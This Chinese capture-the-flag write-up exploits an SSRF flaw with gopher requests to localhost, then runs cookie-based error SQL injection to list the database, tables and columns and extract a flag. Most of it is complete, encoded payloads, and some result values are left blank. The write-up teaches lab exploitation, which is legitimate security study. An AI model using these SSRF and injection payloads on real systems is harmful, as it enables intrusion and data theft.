1.打开题目尝试输入1,1‘进行检测,看看是get请求还是post请求,但是没有回显,然后查看源代码,源代码中有一个use.php文件,访问这个文件,发现这是一个ssrf服务请求伪造漏洞
ssrf漏洞的一些原理
1,可以攻击运行在内网或本地的应用程序
2,利用file协议读取本地文件等
3,对外网的服务器所在内网本地进行端口扫描,获取一些服务banber信息
4,对内网web应用进行指纹识别,通过访问默认文件实现
5,各种协议调用探针如;http,dict,ftp,gopher等等
这个题使用的协议就是gopher协议
那么开始编写脚本,
paylolad为gopher://127.0.0.1:80/_POST%2520/index.php%2520HTTP/1.1%250D%250AHost%253A127.0.0.1%253A80%250D%250AUser-Agent%253A%2520curl/7.43.0%250D%250AAccept%253A%252A/%252A%250D%250AContent-Type%253Aapplication/x-www-form-urlencoded%2520%250D%250AContent-Length%253A24%250D%250A%250D%250Auname%253Dadmin%2526passwd%253Dadmin%250D%250A
然后抓包,查看set-cookie中的内容后面的这个YWRtaW4%3D是一个base64编码解码后意思是admin
然后继续用脚本构造payload,使用set-cookie做注入点
报错注入,那么使用python脚本转gopher协议进行报错注入,payload为gopher://127.0.0.1:80/_GET%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AConnection%253A%2520close%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250ACookie%253Athis_is_your_cookie%253DYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoc2VsZWN0IEBAdmVyc2lvbiksMHg3ZSkpICM%253D%250D%250A%250D%250A
然后查看到了数据库的版本,
然后继续通过脚本进行查看数据库,表和列(字段)脚本如下,
payload为
url=gopher://127.0.0.1:80/_GET%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AConnection%253A%2520close%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250ACookie%253Athis_is_your_cookie%253DYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSAj%250D%250A%250D%250A
查看到数据库为security
然后继续查看表名,脚本为
payload为
url=gopher://127.0.0.1:80/_GET%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AConnection%253A%2520close%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250ACookie%253Athis_is_your_cookie%253DYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoU0VMRUNUIEdST1VQX0NPTkNBVCh0YWJsZV9uYW1lKSBGUk9NIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgV0hFUkUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpLDB4N2UpKSAj%250D%250A%250D%250A
查看到表名为
然后查看表名中的flag这个表
payload为
url=gopher://127.0.0.1:80/_GET%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AConnection%253A%2520close%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250ACookie%253Athis_is_your_cookie%253DYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoU0VMRUNUIEdST1VQX0NPTkNBVChjb2x1bW5fbmFtZSkgRlJPTSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyBXSEVSRSB0YWJsZV9uYW1lPSdmbGFnJyksMHg3ZSkpICM%253D%250D%250A%250D%250A
查看到列名为
最后就是查看内容了,脚本为
payload为
url=gopher://127.0.0.1:80/_GET%2520/index.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AConnection%253A%2520close%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250ACookie%253Athis_is_your_cookie%253DYWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsIGNvbmNhdCgweDdlLCAoU0VMRUNUIGZsYWcgZnJvbSBmbGFnKSwweDdlKSkgIw%253D%253D%250D%250A%250D%250A
然后因为指出来了一般的flag,所以使用right和left来查看flag,并且拼接起来就好了